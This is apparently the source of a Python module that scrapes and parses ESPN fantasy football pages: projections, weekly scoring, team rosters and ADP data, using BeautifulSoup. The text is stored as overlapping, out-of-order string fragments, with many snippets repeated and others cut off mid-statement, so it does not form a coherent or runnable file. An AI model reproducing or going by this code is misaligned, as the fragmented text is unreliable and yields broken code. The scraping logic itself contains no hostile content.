ValueError(\"invalid offset {}\".format(offset)) # https://fantasy.espn.com/football/players/projections", "# NOTE: trouble accessing data in offseason # will have to revisit this", "2016 week: int 1, 2, 3 offset: int 0, 40, 80, etc. 
Returns:", "row.find(\"a\", {\"href\": re.compile(r\"/team/_/name\")}) if link: match = re.search(r\"name/(\\w+)/\", link[\"href\"]) if match: player[\"source_team_code\"] =", "f\"http://www.espn.com/nfl/team/roster/_/name/{team_code}\" return self.get(url, encoding=\"latin1\") def weekly_scoring(self, season_year, week, position): \"\"\" Gets weekly fantasy", "\"\"\" def __init__(self, source_name=\"espn\"): \"\"\" Args: source_name(str): either 'espn' or 'espn_fantasy' \"\"\" super().__init__()", "40 > 0: raise ValueError(\"invalid offset {}\".format(offset)) # https://fantasy.espn.com/football/players/projections url = \"http://games.espn.com/ffl/tools/projections?\" if", "if class_matches.intersection(classes): player = {\"source\": \"espn\", \"source_player_position\": pos} tds = row.find_all(\"td\") # tds[0]:", "# loop through stats # they have attempts/completions in one column so have", "Returns: HTML string \"\"\" url = f\"http://www.espn.com/nfl/team/roster/_/name/{team_code}\" return self.get(url, encoding=\"latin1\") def weekly_scoring(self, season_year,", "= child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results class Agent: \"\"\" Combines common", "players by position Args: pos(str): qb, rb, wr, te, k, etc. 
Returns: str", "tds = row.find_all(\"td\") if len(tds) != 8: continue player[\"source_player_position\"] = tds[2].text player[\"source_player_name\"] =", "\"\"\" players = [] soup = BeautifulSoup(content, \"lxml\") for row in soup.find_all(\"tr\"): link", "player[\"source_player_name\"] = link.text player[\"source_player_team\"], player[ \"source_player_position\" ] = navstr.split()[-2:] player[\"source_player_id\"] = link.attrs.get(\"playerid\") #", "= match.group(1) # tds[1]: <td><a href=\"http://www.espn.com/nfl/team/_/ # name/jax/jacksonville-jaguars\"><NAME></a></td> player[\"source_team_name\"] = tds[1].text link =", "of dict \"\"\" content = self._s.adp(season_year) return self._p.adp(content) class Xref(Site): \"\"\" Cross-reference source", "def __init__(self, scraper=None, parser=None, cache_name=\"espn-agent\"): \"\"\" Creates Agent object Args: scraper(espn.Scraper): default None", "\"rush_att\", \"rush_yds\", \"rush_td\", \"rec\", \"rec_yds\", \"rec_td\", \"fantasy_points_ppr\", ] for row in soup.findAll(\"tr\", {\"class\":", "non-numeric value to numeric 0 Args: val: Returns: number \"\"\" if \"--\" in", "\"rb\": 2, \"wr\": 4, \"te\": 6, \"dst\": 16, \"k\": 17} max_offset = {\"qb\":", "item[\"player\"].items() if k in tl_wanted} for scoring_type in [\"PPR\", \"STANDARD\"]: for rank_type in", "\"pncPlayerRow\"}): player = {\"source\": \"espn\"} tds = row.find_all(\"td\") # tds[0]: rank player[\"source_position_rank\"] =", "[td.text for td in row.find_all(\"td\", class_=\"playertableStat\")] if tds: player = dict(zip(headers, tds)) #", "Gets season ADP data Args: season_year(int): 2018, 2019, etc. 
Returns: list: of dict", "pos} tds = row.find_all(\"td\") # tds[0]: <a href=\"http://www.espn.com/nfl/player/_/id/ # 2574511/brandon-allen\"><NAME></a> player[\"source_player_name\"] = tds[0].text", "2, \"wr\": 4, \"te\": 6, \"dst\": 16, \"k\": 17} max_offset = {\"qb\": 120,", "sortable projections page Args: content: HTML string Returns: list of dict \"\"\" players", "ValueError(\"invalid position: {}\".format(pos)) def adp(self, season_year): \"\"\" Gets adp data Args: season_year(int): 2019,", "slot_categories = {\"qb\": 0, \"rb\": 2, \"wr\": 4, \"te\": 6, \"dst\": 16, \"k\":", "link.text player[\"source_player_team\"], player[ \"source_player_position\" ] = navstr.split()[-2:] player[\"source_player_id\"] = link.attrs.get(\"playerid\") # loop through", "child in nametd.children: if isinstance(child, NavigableString): player[\"source_player_team\"], player[ \"source_player_position\" ] = child.string.split()[1:3] elif", "@staticmethod def team_roster(content): \"\"\" Parses team roster page into list of player dict", "max_offset = {\"qb\": 120, \"rb\": 240, \"wr\": 360, \"te\": 160, \"dst\": 0, \"k\":", "player[\"source_player_id\"] = link.attrs.get(\"playerid\") # loop through stats # they have attempts/completions in one", "have to remove & split player[\"fantasy_points_ppr\"] = self._val(tds[-1].text) players.append(player) else: pass return players", "] = navstr.split()[-2:] player[\"source_player_id\"] = link.attrs.get(\"playerid\") # loop through stats # they have", "tds)) # name, team, position nametd = row.find(\"td\", {\"id\": re.compile(r\"playername\")}) for child in", "offset=0): \"\"\" Gets page with projections by position Args: pos: str qb, rb,", "8: \"Det\", 9: \"GB\", 10: \"Ten\", 11: \"Ind\", 12: \"KC\", 13: \"Oak\", 14:", "ESPN fantasy football season-long sortable projections page Args: content: HTML string Returns: list", "\"lxml\") if pos.lower() in [\"qb\", \"rb\", \"wr\", \"te\", \"flex\"]: headers = [ \"pass_att\",", "# tds[1]: <td><a 
href=\"http://www.espn.com/nfl/team/_/ # name/jax/jacksonville-jaguars\"><NAME></a></td> player[\"source_team_name\"] = tds[1].text link = row.find(\"a\", {\"href\":", "= {k: v for k, v in item[\"player\"].items() if k in tl_wanted} for", "about managing fantasy teams # NOTE: trouble accessing data in offseason # will", "players @staticmethod def team_roster(content): \"\"\" Parses team roster page into list of player", "\"\"\" url = \"http://www.espn.com/nfl/players?position={}&league=nfl\" return self.get(url.format(pos), encoding=\"latin1\") def projections(self, pos, season_year=None, week=0, offset=0):", "__init__(self): \"\"\" \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) @staticmethod def _val(val): \"\"\" Converts non-numeric value to numeric", "1, 2, 3 offset: int 0, 40, 80, etc. Returns: HTML string TODO:", "[\"rank\", \"auctionValue\"]: key = scoring_type.lower() + \"_\" + rank_type try: api_player[key] = item[\"player\"][\"draftRanksByRankType\"][", "None parser(espn.Parser): default None cache_name(str): default 'espn-agent' \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) if scraper: self._s =", "players.append(player) except ValueError: pass return players @staticmethod def weekly_scoring(content): \"\"\" Parses weekly scoring", "= navstr.split()[-2:] player[\"source_player_id\"] = link.attrs.get(\"playerid\") # loop through stats # they have attempts/completions", "k, v in item[\"player\"].items() if k in tl_wanted} for scoring_type in [\"PPR\", \"STANDARD\"]:", "tds[0].text # tds[1]: name/team/pos link, navstr = list(tds[1].children)[0:2] player[\"source_player_name\"] = link.text player[\"source_player_team\"], player[", "weekly scoring page Args: content (str): HTML Returns: list: of dict \"\"\" results", "pos, season_year=None, week=0, offset=0): \"\"\" Gets page with projections by position Args: pos:", "weekly scoring page for dst Args: content(str): HTML Returns: list: of dict \"\"\"", "for dst Args: 
content(str): HTML Returns: list: of dict \"\"\" # TODO: adapt", "= { \"scoringPeriodId\": week, \"seasonId\": season_year, \"slotCategoryId\": position, } return self.get(url, params=params) class", "= f\"http://www.espn.com/nfl/team/roster/_/name/{team_code}\" return self.get(url, encoding=\"latin1\") def weekly_scoring(self, season_year, week, position): \"\"\" Gets weekly", "link[\"href\"]) if match: player[\"source_player_id\"] = match.group(1) # tds[1]: <td><a href=\"http://www.espn.com/nfl/team/_/ # name/jax/jacksonville-jaguars\"><NAME></a></td> player[\"source_team_name\"]", "td in tds[3:]] for header, val in zip(headers, tds[2].text.split(\"/\") + vals): player[header] =", "\"Atl\", 2: \"Buf\", 3: \"Chi\", 4: \"Cin\", 5: \"Cle\", 6: \"Dal\", 7: \"Den\",", "offset: int 0, 40, 80, etc. Returns: HTML string TODO: revise based on", "\"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\", \"rec_rec\", \"rec_yds\", \"rec_td\", \"rec_tar\", \"tpc\", \"fumble\", \"misc_td\",", "try: api_player[key] = item[\"player\"][\"draftRanksByRankType\"][ scoring_type ][rank_type] except KeyError: api_player[key] = None vals.append(api_player) return", "# will have to revisit this module as season approaches \"\"\" import logging", "vals = [] for item in content[\"players\"]: tl_wanted = [ \"defaultPositionId\", \"firstName\", \"id\",", "of espn nfl team roster page Returns: list of dict \"\"\" players =", "\"\"\" players = [] soup = BeautifulSoup(content, \"lxml\") for row in soup.find_all(\"tr\"): class_matches", "Parses weekly scoring page for dst Args: content(str): HTML Returns: list: of dict", "team_code: str 'DEN', 'BUF', etc. 
Returns: HTML string \"\"\" url = f\"http://www.espn.com/nfl/team/roster/_/name/{team_code}\" return", "\"D/ST\" return pos.upper() else: raise ValueError(\"invalid position: {}\".format(pos)) def adp(self, season_year): \"\"\" Gets", "\"evenrow\"]) classes = set(row.attrs.get(\"class\", [])) if class_matches.intersection(classes): player = {\"source\": \"espn\", \"source_player_position\": pos}", "raise ValueError(\"invalid offset {}\".format(offset)) if offset % 40 > 0: raise ValueError(\"invalid offset", "= tds[1].text link = row.find(\"a\", {\"href\": re.compile(r\"/team/_/name\")}) if link: match = re.search(r\"name/(\\w+)/\", link[\"href\"])", "pos.lower() == \"k\": for row in soup.findAll(\"tr\", {\"class\": \"pncPlayerRow\"}): player = {\"source\": \"espn\"}", "\"\"\" # TODO: adapt for dst results = [] headers = [ \"c_a\",", "] soup = BeautifulSoup(content, \"lxml\") tbl = soup.select(\"table#playertable_0\")[0] for row in tbl.find_all(\"tr\", {\"id\":", "player[\"source_player_name\"] = link.text player[\"source_player_id\"] = link[\"href\"].split(\"/\")[-2] players.append(player) except ValueError: pass return players @staticmethod", "list: of dict \"\"\" # TODO: adapt for dst results = [] headers", "offset} if week: params[\"scoringPeriodId\"] = week else: params[\"seasonTotals\"] = \"true\" return self.get(url, params=params,", "= \"true\" return self.get(url, params=params, encoding=\"latin1\") def team_roster(self, team_code): \"\"\" Gets list of", "url = \"http://www.espn.com/nfl/players?position={}&league=nfl\" return self.get(url.format(pos), encoding=\"latin1\") def projections(self, pos, season_year=None, week=0, offset=0): \"\"\"", "list of dict \"\"\" players = [] soup = BeautifulSoup(content, \"lxml\") if pos.lower()", "loop through stats # they have attempts/completions in one column so have to", "Returns: str: HTML TODO: rework for new URL \"\"\" poscode = {\"qb\": 0,", "\"qb\", \"rb\", \"wr\", \"te\", \"dst\", \"d/st\", \"k\", \"QB\", 
\"RB\", \"WR\", \"TE\", \"K\", \"D/ST\",", "(int): 1 through 17 position (str): 'qb', 'wr', etc. Returns: str: HTML TODO:", "\"DST\", ]: if pos in [\"DST\", \"dst\"]: pos = \"D/ST\" return pos.upper() else:", "re.compile(r\"/nfl/player/_/id/\")}) try: player = {\"source\": \"espn\"} tds = row.find_all(\"td\") if len(tds) != 8:", "player[\"source_player_team\"], player[ \"source_player_position\" ] = child.string.split()[1:3] elif isinstance(child, Tag): player[\"source_player_name\"] = child.string player[\"source_player_id\"]", "except KeyError: api_player[key] = None vals.append(api_player) return vals def projections(self, content, pos): \"\"\"", "revisit this module as season approaches \"\"\" import logging import re from bs4", "self._p = Parser() def adp(self, season_year): \"\"\" Gets season ADP data Args: season_year(int):", "Tag from namematcher.xref import Site from sportscraper.scraper import RequestScraper FANTASY_TEAMS = { 1:", "dict Args: content: HTML of espn nfl team roster page Returns: list of", "sportscraper.scraper import RequestScraper FANTASY_TEAMS = { 1: \"Atl\", 2: \"Buf\", 3: \"Chi\", 4:", "new URL \"\"\" pos = pos.lower() slot_categories = {\"qb\": 0, \"rb\": 2, \"wr\":", "dict \"\"\" # TODO: adapt for kicker results = [] headers = [", "scoring page Args: content (str): HTML Returns: list: of dict \"\"\" results =", "FANTASY_TEAMS = { 1: \"Atl\", 2: \"Buf\", 3: \"Chi\", 4: \"Cin\", 5: \"Cle\",", "https://fantasy.espn.com/football/leaders url = \"http://games.espn.com/ffl/leaders?&\" params = { \"scoringPeriodId\": week, \"seasonId\": season_year, \"slotCategoryId\": position,", "\"\"\" players = [] soup = BeautifulSoup(content, \"lxml\") if pos.lower() in [\"qb\", \"rb\",", "weekly_scoring_k(content): \"\"\" Parses weekly scoring page for kickers Args: content (str): HTML Returns:", "\"slotCategoryId\": position, } return self.get(url, params=params) class Parser: \"\"\" Parse ESPN.com for football", "tbl.find_all(\"tr\", {\"id\": 
re.compile(r\"plyr\")}): tds = [td.text for td in row.find_all(\"td\", class_=\"playertableStat\")] if tds:", "= [self._val(td.text) for td in tds[3:]] for header, val in zip(headers, tds[2].text.split(\"/\") +", "= [td.text for td in row.find_all(\"td\", class_=\"playertableStat\")] if tds: player = dict(zip(headers, tds))", "( f\"http://fantasy.espn.com/apis/v3/games/ffl/seasons/{season_year}/\" f\"segments/0/leaguedefaults/1?view=kona_player_info\" ) return self.get_json(url) def players_position(self, pos): \"\"\" Gets page with", "pos): \"\"\" Gets page with all players by position Args: pos(str): qb, rb,", "16, \"k\": 17} if position.lower() not in poscode: raise ValueError(\"invalid position: {}\".format(position)) #", "[])) if class_matches.intersection(classes): player = {\"source\": \"espn\", \"source_player_position\": pos} tds = row.find_all(\"td\") #", "etc. season_year: int 2017, 2016 week: int 1, 2, 3 offset: int 0,", "list of NFL players from ESPN.com Args: team_code: str 'DEN', 'BUF', etc. 
Returns:", "\"dst\": 16, \"k\": 17} if position.lower() not in poscode: raise ValueError(\"invalid position: {}\".format(position))", "tds[0].text link = row.find(\"a\", {\"href\": re.compile(r\"/player/_/\")}) if link: match = re.search(r\"\\/id\\/([0-9]+)\", link[\"href\"]) if", "if link: match = re.search(r\"\\/id\\/([0-9]+)\", link[\"href\"]) if match: player[\"source_player_id\"] = match.group(1) # tds[1]:", "default None parser(espn.Parser): default None cache_name(str): default 'espn-agent' \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) if scraper: self._s", "row in tbl.find_all(\"tr\", {\"id\": re.compile(r\"plyr\")}): tds = [td.text for td in row.find_all(\"td\", class_=\"playertableStat\")]", "for kicker results = [] headers = [ \"c_a\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\",", "return self.get(url, encoding=\"latin1\") def weekly_scoring(self, season_year, week, position): \"\"\" Gets weekly fantasy scoring", "16: \"Min\", 17: \"NE\", 18: \"NO\", 19: \"NYG\", 20: \"NYJ\", 21: \"Phi\", 22:", "[ \"pass_att\", \"pass_cmp\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\", \"rec\", \"rec_yds\", \"rec_td\", \"fantasy_points_ppr\",", "\"rb\", \"wr\", \"te\", \"flex\"]: headers = [ \"pass_att\", \"pass_cmp\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\",", "class_=\"playertableStat\")] if tds: player = dict(zip(headers, tds)) # name, team, position nametd =", "= child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results @staticmethod def weekly_scoring_dst(content): \"\"\" Parses", "= \"http://games.espn.com/ffl/tools/projections?\" if season_year: params = { \"slotCategoryId\": slot_categories[pos], \"startIndex\": offset, \"seasonId\": season_year,", "wr, te, k, etc. 
Returns: str \"\"\" url = \"http://www.espn.com/nfl/players?position={}&league=nfl\" return self.get(url.format(pos), encoding=\"latin1\")", "link.attrs.get(\"playerid\") # loop through stats # they have attempts/completions in one column so", "roster page Returns: list of dict \"\"\" players = [] soup = BeautifulSoup(content,", "tds[1]: name/team/pos link, navstr = list(tds[1].children)[0:2] player[\"source_player_name\"] = link.text player[\"source_player_team\"], player[ \"source_player_position\" ]", "\"dst\"]: pos = \"D/ST\" return pos.upper() else: raise ValueError(\"invalid position: {}\".format(pos)) def adp(self,", "\"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\", \"rec\", \"rec_yds\", \"rec_td\", \"fantasy_points_ppr\", ] for row in soup.findAll(\"tr\",", "in offseason # will have to revisit this module as season approaches \"\"\"", "\"\"\" # TODO: adapt for kicker results = [] headers = [ \"c_a\",", "return val @staticmethod def adp(content): \"\"\" Parses season-long ADP Args: content: Returns: list", "\"fantasy_points_ppr\", ] for row in soup.findAll(\"tr\", {\"class\": \"pncPlayerRow\"}): player = {\"source\": \"espn\"} tds", "ValueError(\"invalid position: {}\".format(position)) # https://fantasy.espn.com/football/leaders url = \"http://games.espn.com/ffl/leaders?&\" params = { \"scoringPeriodId\": week,", "8: continue player[\"source_player_position\"] = tds[2].text player[\"source_player_name\"] = link.text player[\"source_player_id\"] = link[\"href\"].split(\"/\")[-2] players.append(player) except", "etc. 
Returns: list: of dict \"\"\" content = self._s.adp(season_year) return self._p.adp(content) class Xref(Site):", "\"\"\" # espn.py # classes for scraping, parsing espn football data # this", "position: {}\".format(position)) # https://fantasy.espn.com/football/leaders url = \"http://games.espn.com/ffl/leaders?&\" params = { \"scoringPeriodId\": week, \"seasonId\":", "Converts non-numeric value to numeric 0 Args: val: Returns: number \"\"\" if \"--\"", "players = [] soup = BeautifulSoup(content, \"lxml\") if pos.lower() in [\"qb\", \"rb\", \"wr\",", "isinstance(child, NavigableString): player[\"source_player_team\"], player[ \"source_player_position\" ] = child.string.split()[1:3] elif isinstance(child, Tag): player[\"source_player_name\"] =", "\"Pit\", 24: \"LAC\", 25: \"SF\", 26: \"Sea\", 27: \"TB\", 28: \"Wsh\", 29: \"Car\",", "\"wr\": 4, \"te\": 6, \"dst\": 16, \"k\": 17} if position.lower() not in poscode:", "espn nfl team roster page Returns: list of dict \"\"\" players = []", "__init__(self, scraper=None, parser=None, cache_name=\"espn-agent\"): \"\"\" Creates Agent object Args: scraper(espn.Scraper): default None parser(espn.Parser):", "0 return val @staticmethod def adp(content): \"\"\" Parses season-long ADP Args: content: Returns:", "Parses weekly scoring page Args: content (str): HTML Returns: list: of dict \"\"\"", "on new URL \"\"\" pos = pos.lower() slot_categories = {\"qb\": 0, \"rb\": 2,", "\"\"\" Gets weekly fantasy scoring page Args: season_year (int): 2017, 2016, etc. 
week", "list of player dict Args: content: HTML of espn nfl team roster page", "# https://fantasy.espn.com/football/leaders url = \"http://games.espn.com/ffl/leaders?&\" params = { \"scoringPeriodId\": week, \"seasonId\": season_year, \"slotCategoryId\":", "Tag): player[\"source_player_name\"] = child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results @staticmethod def weekly_scoring_dst(content):", "\"k\": 17} if position.lower() not in poscode: raise ValueError(\"invalid position: {}\".format(position)) # https://fantasy.espn.com/football/leaders", "= week else: params[\"seasonTotals\"] = \"true\" return self.get(url, params=params, encoding=\"latin1\") def team_roster(self, team_code):", "\"scoringPeriodId\": week, \"seasonId\": season_year, \"slotCategoryId\": position, } return self.get(url, params=params) class Parser: \"\"\"", "position: {}\".format(pos)) def adp(self, season_year): \"\"\" Gets adp data Args: season_year(int): 2019, etc.", "# name, team, position nametd = row.find(\"td\", {\"id\": re.compile(r\"playername\")}) for child in nametd.children:", "is mostly about managing fantasy teams # NOTE: trouble accessing data in offseason", "list: of dict \"\"\" players = [] soup = BeautifulSoup(content, \"lxml\") for row", "as season approaches \"\"\" import logging import re from bs4 import BeautifulSoup, NavigableString,", "\"NO\", 19: \"NYG\", 20: \"NYJ\", 21: \"Phi\", 22: \"Ari\", 23: \"Pit\", 24: \"LAC\",", "Gets page with projections by position Args: pos: str qb, rb, wr, te,", "\"wr\": 4, \"te\": 6, \"dst\": 16, \"k\": 17} max_offset = {\"qb\": 120, \"rb\":", "if pos not in slot_categories.keys(): raise ValueError(\"invalid pos {}\".format(pos)) if offset > max_offset.get(pos):", "= row.find(\"a\", {\"href\": re.compile(r\"/nfl/player/_/id/\")}) try: player = {\"source\": \"espn\"} tds = row.find_all(\"td\") if", "def _check_pos(pos): \"\"\" Makes sure pos is valid and uppercase Args: pos(str): 
Returns:", "import BeautifulSoup, NavigableString, Tag from namematcher.xref import Site from sportscraper.scraper import RequestScraper FANTASY_TEAMS", "list: of dict \"\"\" results = [] headers = [ \"c_a\", \"pass_yds\", \"pass_td\",", "have to revisit this module as season approaches \"\"\" import logging import re", "return vals def projections(self, content, pos): \"\"\" Parses ESPN fantasy football season-long sortable", "{\"href\": re.compile(r\"/nfl/player/_/id/\")}) try: player = {\"source\": \"espn\"} tds = row.find_all(\"td\") if len(tds) !=", "this does include some basic fantasy data # espn_fantasy is mostly about managing", "\"\"\" Combines common scraping/parsing tasks \"\"\" def __init__(self, scraper=None, parser=None, cache_name=\"espn-agent\"): \"\"\" Creates", "common scraping/parsing tasks \"\"\" def __init__(self, scraper=None, parser=None, cache_name=\"espn-agent\"): \"\"\" Creates Agent object", "return results class Agent: \"\"\" Combines common scraping/parsing tasks \"\"\" def __init__(self, scraper=None,", "if pos in [ \"qb\", \"rb\", \"wr\", \"te\", \"dst\", \"d/st\", \"k\", \"QB\", \"RB\",", "in poscode: raise ValueError(\"invalid position: {}\".format(position)) # https://fantasy.espn.com/football/leaders url = \"http://games.espn.com/ffl/leaders?&\" params =", "season_year: int 2017, 2016 week: int 1, 2, 3 offset: int 0, 40,", "def projections(self, content, pos): \"\"\" Parses ESPN fantasy football season-long sortable projections page", "v in item[\"player\"].items() if k in tl_wanted} for scoring_type in [\"PPR\", \"STANDARD\"]: for", "soup = BeautifulSoup(content, \"lxml\") for row in soup.find_all(\"tr\"): class_matches = set([\"oddrow\", \"evenrow\"]) classes", "Returns: number \"\"\" if \"--\" in val: return 0 return val @staticmethod def", "\"RB\", \"WR\", \"TE\", \"K\", \"D/ST\", \"DST\", ]: if pos in [\"DST\", \"dst\"]: pos", "dst results = [] headers = [ \"c_a\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", 
\"rush_yds\",", "\"espn\"} tds = row.find_all(\"td\") # tds[0]: rank player[\"source_position_rank\"] = tds[0].text # tds[1]: name/team/pos", "30: \"Jax\", 33: \"Bal\", 34: \"Hou\", } class Scraper(RequestScraper): \"\"\" Scrape ESPN.com for", "scoring page for dst Args: content(str): HTML Returns: list: of dict \"\"\" #", "data Args: season_year(int): 2019, etc. Returns: dict: parsed JSON \"\"\" url = (", "dict \"\"\" vals = [] for item in content[\"players\"]: tl_wanted = [ \"defaultPositionId\",", "ValueError(\"invalid offset {}\".format(offset)) if offset % 40 > 0: raise ValueError(\"invalid offset {}\".format(offset))", "tds = row.find_all(\"td\") # tds[0]: <a href=\"http://www.espn.com/nfl/player/_/id/ # 2574511/brandon-allen\"><NAME></a> player[\"source_player_name\"] = tds[0].text link", "val in zip(headers, tds[2].text.split(\"/\") + vals): player[header] = val players.append(player) elif pos.lower() ==", "= [] soup = BeautifulSoup(content, \"lxml\") for row in soup.find_all(\"tr\"): class_matches = set([\"oddrow\",", "= [ \"defaultPositionId\", \"firstName\", \"id\", \"lastName\", \"proTeamId\", ] api_player = {k: v for", "\"c_a\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\", \"rec_rec\", \"rec_yds\", \"rec_td\", \"rec_tar\", \"tpc\", \"fumble\",", "players.append(player) else: pass return players @staticmethod def players_position(content, pos): \"\"\" Parses page of", "re.compile(r\"plyr\")}): tds = [td.text for td in row.find_all(\"td\", class_=\"playertableStat\")] if tds: player =", "bs4 import BeautifulSoup, NavigableString, Tag from namematcher.xref import Site from sportscraper.scraper import RequestScraper", "page for dst Args: content(str): HTML Returns: list: of dict \"\"\" # TODO:", "\"firstName\", \"id\", \"lastName\", \"proTeamId\", ] api_player = {k: v for k, v in", "= [] soup = BeautifulSoup(content, \"lxml\") for row in soup.find_all(\"tr\"): link = row.find(\"a\",", "classes for scraping, parsing espn 
football data # this does include some basic", "not in poscode: raise ValueError(\"invalid position: {}\".format(position)) # https://fantasy.espn.com/football/leaders url = \"http://games.espn.com/ffl/leaders?&\" params", "Returns: dict: parsed JSON \"\"\" url = ( f\"http://fantasy.espn.com/apis/v3/games/ffl/seasons/{season_year}/\" f\"segments/0/leaguedefaults/1?view=kona_player_info\" ) return self.get_json(url)", "13: \"Oak\", 14: \"LAR\", 15: \"Mia\", 16: \"Min\", 17: \"NE\", 18: \"NO\", 19:", "val: return 0 return val @staticmethod def adp(content): \"\"\" Parses season-long ADP Args:", "content: HTML of espn nfl team roster page Returns: list of dict \"\"\"", "\"fumble\", \"misc_td\", \"fpts\", ] soup = BeautifulSoup(content, \"lxml\") tbl = soup.select(\"table#playertable_0\")[0] for row", "0 Args: val: Returns: number \"\"\" if \"--\" in val: return 0 return", "they have attempts/completions in one column so have to remove & split player[\"fantasy_points_ppr\"]", "\"\"\" \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) @staticmethod def _val(val): \"\"\" Converts non-numeric value to numeric 0", "fantasy football season-long sortable projections page Args: content: HTML string Returns: list of", "self._p.adp(content) class Xref(Site): \"\"\" Cross-reference source players with other names/ids \"\"\" def __init__(self,", "row.find(\"td\", {\"id\": re.compile(r\"playername\")}) for child in nametd.children: if isinstance(child, NavigableString): player[\"source_player_team\"], player[ \"source_player_position\"", "offset {}\".format(offset)) # https://fantasy.espn.com/football/players/projections url = \"http://games.espn.com/ffl/tools/projections?\" if season_year: params = { \"slotCategoryId\":", "__init__(self, source_name=\"espn\"): \"\"\" Args: source_name(str): either 'espn' or 'espn_fantasy' \"\"\" super().__init__() self.source_name =", "so have to remove & split player[\"fantasy_points_ppr\"] = self._val(tds[-1].text) 
players.append(player) else: pass return", "results @staticmethod def weekly_scoring_k(content): \"\"\" Parses weekly scoring page for kickers Args: content", "pos = pos.lower() slot_categories = {\"qb\": 0, \"rb\": 2, \"wr\": 4, \"te\": 6,", "\"rush_yds\", \"rush_td\", \"rec\", \"rec_yds\", \"rec_td\", \"fantasy_points_ppr\", ] for row in soup.findAll(\"tr\", {\"class\": \"pncPlayerRow\"}):", "+ \"_\" + rank_type try: api_player[key] = item[\"player\"][\"draftRanksByRankType\"][ scoring_type ][rank_type] except KeyError: api_player[key]", "= item[\"player\"][\"draftRanksByRankType\"][ scoring_type ][rank_type] except KeyError: api_player[key] = None vals.append(api_player) return vals def", "re.search(r\"name/(\\w+)/\", link[\"href\"]) if match: player[\"source_team_code\"] = match.group(1) # tds[2]: <td>Arkansas</td> player[\"college\"] = tds[2].text", "\"http://games.espn.com/ffl/tools/projections?\" if season_year: params = { \"slotCategoryId\": slot_categories[pos], \"startIndex\": offset, \"seasonId\": season_year, }", "ESPN.com for football stats \"\"\" def __init__(self): \"\"\" \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) @staticmethod def _val(val):", "Returns: list of dict \"\"\" vals = [] for item in content[\"players\"]: tl_wanted", "so have to remove & split vals = [self._val(td.text) for td in tds[3:]]", "tl_wanted} for scoring_type in [\"PPR\", \"STANDARD\"]: for rank_type in [\"rank\", \"auctionValue\"]: key =", "content: HTML string Returns: list of dict \"\"\" players = [] soup =", "projections page Args: content: HTML string Returns: list of dict \"\"\" players =", "header, val in zip(headers, tds[2].text.split(\"/\") + vals): player[header] = val players.append(player) elif pos.lower()", "dict \"\"\" # TODO: adapt for dst results = [] headers = [", "\"http://www.espn.com/nfl/players?position={}&league=nfl\" return self.get(url.format(pos), encoding=\"latin1\") def projections(self, pos, season_year=None, week=0, 
offset=0): \"\"\" Gets page", "all players by position Args: pos(str): qb, rb, wr, te, k, etc. Returns:", "& split vals = [self._val(td.text) for td in tds[3:]] for header, val in", "\"\"\" Converts non-numeric value to numeric 0 Args: val: Returns: number \"\"\" if", "\"dst\": 0, \"k\": 40} if pos not in slot_categories.keys(): raise ValueError(\"invalid pos {}\".format(pos))", "\"Cin\", 5: \"Cle\", 6: \"Dal\", 7: \"Den\", 8: \"Det\", 9: \"GB\", 10: \"Ten\",", "encoding=\"latin1\") def projections(self, pos, season_year=None, week=0, offset=0): \"\"\" Gets page with projections by", "content (str): HTML Returns: list: of dict \"\"\" # TODO: adapt for kicker", "if k in tl_wanted} for scoring_type in [\"PPR\", \"STANDARD\"]: for rank_type in [\"rank\",", "week, \"seasonId\": season_year, \"slotCategoryId\": position, } return self.get(url, params=params) class Parser: \"\"\" Parse", "week, position): \"\"\" Gets weekly fantasy scoring page Args: season_year (int): 2017, 2016,", "val players.append(player) elif pos.lower() == \"k\": for row in soup.findAll(\"tr\", {\"class\": \"pncPlayerRow\"}): player", "= {\"source\": \"espn\"} tds = row.find_all(\"td\") if len(tds) != 8: continue player[\"source_player_position\"] =", "return players @staticmethod def weekly_scoring(content): \"\"\" Parses weekly scoring page Args: content (str):", "\"rush_att\", \"rush_yds\", \"rush_td\", \"rec_rec\", \"rec_yds\", \"rec_td\", \"rec_tar\", \"tpc\", \"fumble\", \"misc_td\", \"fpts\", ] soup", "tds = [td.text for td in row.find_all(\"td\", class_=\"playertableStat\")] if tds: player = dict(zip(headers,", "have attempts/completions in one column so have to remove & split player[\"fantasy_points_ppr\"] =", "{}\".format(pos)) def adp(self, season_year): \"\"\" Gets adp data Args: season_year(int): 2019, etc. 
Returns:", "= self._val(tds[-1].text) players.append(player) else: pass return players @staticmethod def players_position(content, pos): \"\"\" Parses", "'espn-agent' \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) if scraper: self._s = scraper else: self._s = Scraper(cache_name=cache_name) if", "if tds: player = dict(zip(headers, tds)) # name, team, position nametd = row.find(\"td\",", "if offset % 40 > 0: raise ValueError(\"invalid offset {}\".format(offset)) # https://fantasy.espn.com/football/players/projections url", "Args: season_year(int): 2019, etc. Returns: dict: parsed JSON \"\"\" url = ( f\"http://fantasy.espn.com/apis/v3/games/ffl/seasons/{season_year}/\"", "list: of dict \"\"\" content = self._s.adp(season_year) return self._p.adp(content) class Xref(Site): \"\"\" Cross-reference", "= child.string.split()[1:3] elif isinstance(child, Tag): player[\"source_player_name\"] = child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return", "football data # this does include some basic fantasy data # espn_fantasy is", "pos(str): qb, rb, wr, te, k, etc. 
